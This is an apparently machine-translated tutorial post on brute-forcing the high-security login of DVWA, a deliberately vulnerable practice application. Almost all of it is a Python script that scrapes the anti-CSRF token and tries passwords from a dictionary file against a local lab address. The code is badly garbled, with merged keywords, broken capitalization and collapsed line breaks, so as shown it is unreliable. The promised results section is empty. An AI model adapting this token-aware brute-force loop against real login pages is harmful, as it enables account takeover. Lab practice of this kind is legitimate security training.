This article focuses on DVWA penetration test platform, brute force-high level
Part of the analysis is omitted, directly on the script code:
Coding:utf-8#Author:freemImportRequests fromBs4ImportBeautifulSoupImportUrllibheader={'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','accept-encoding':'gzip, deflate','Accept-language':'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3','Cookies':'Security=high; PHPSESSID=5JR7EGBT0R324AKLOHB699U2Q1','Host':'192.168.207.129','Referer':'http://192.168.207.129/DVWA/vulnerabilities/brute/index.php','upgrade-insecure-requests':'1','user-agent':'mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) gecko/20100101 firefox/53.0','Connection':'keep-alive'} #HeadersdefGet_content (request_url,headers):#used to request Try: ifRequest_url isNone:return ""Response=requests.get (request_url,headers=headers,timeout=20) response.raise_for_status () response.encoding=response.apparent_encodingreturnResponse.text#print (len (response.text)) #print (Response.text) except : Print("Please be careful of exception!") Print(requests. Connectionerror.strerror)defget_detail (URL):Try: ifUrl isNone:return ""Response=requests.get (url,timeout=20) response.raise_for_status () response.encoding=response.apparent_encodingreturnResponse.text#print (Response.text) except : Print("Please be careful of exception!") Print(requests. Connectionerror.strerror)defGet_taken (url,content):#used to get ifUrl isNoneorContent isNone:returnNone Soup=beautifulsoup (Content,'Html.parser') Taken=soup.find ('form'). Find ('input', type="Hidden") #print (taken)user_taken=taken['value'] #print (Type (user_taken)) returnUser_takendefBrute_force (User_taken,passwd,successful_check,header):#single page hackBrute_url='Http://192.168.207.129/DVWA/vulnerabilities/brute/?username=admin&password=123456789&Login=Login &user_token='+User_taken brute_page=requests.get (brute_url,headers=header). Text#print (brute_page) ifSuccessful_checkinchBrute_page:Print("Username:admin\n+password:"+passwd+"\ Brute_force successufl!") Else: Print("failed ~~~~~~~~")defBrute_force_dir (User_taken,file,successful_check,header):#dictionary hackWith open (file,'R') as F:#Open Dictionary file forLineinchf:passwd=line#reads one row at a time and assigns a value to passwd as the password, with the URL enteredBrute_url='http://192.168.207.129/DVWA/vulnerabilities/brute/?username=admin&password='+passwd.strip () +'&login=login&user_token='+User_takenPrint(brute_url) brute_page=get_content (brute_url,header) User_taken= Get_taken (Brute_url, Brute_page)#Perhaps the current User_taken value #print (User_taken) Print(Len (brute_page))ifSuccessful_checkinchBrute_page:#If the match succeeds, give a success hint Print("Username:admin\npassword:"+passwd+"\ Brute_force successufl!") Else: Print("Username:admin\npassword:"+passwd+"\ Brute_force faild~~")#Match failedURL='http://192.168.207.129/DVWA/vulnerabilities/brute/'Successful_check="Welcome to the password protected area"content=get_content (Url,header)Print(len (content))#Print (content)user_taken=get_taken (url,content) password="Ppp.txt" #Dictionary files ppp.txt#password= "123456789"#Brute_force (Url,user_taken,password,successful_check,header)Brute_force_dir (User_taken,password,successful_check,header)
The results are as follows:
Brute Force-python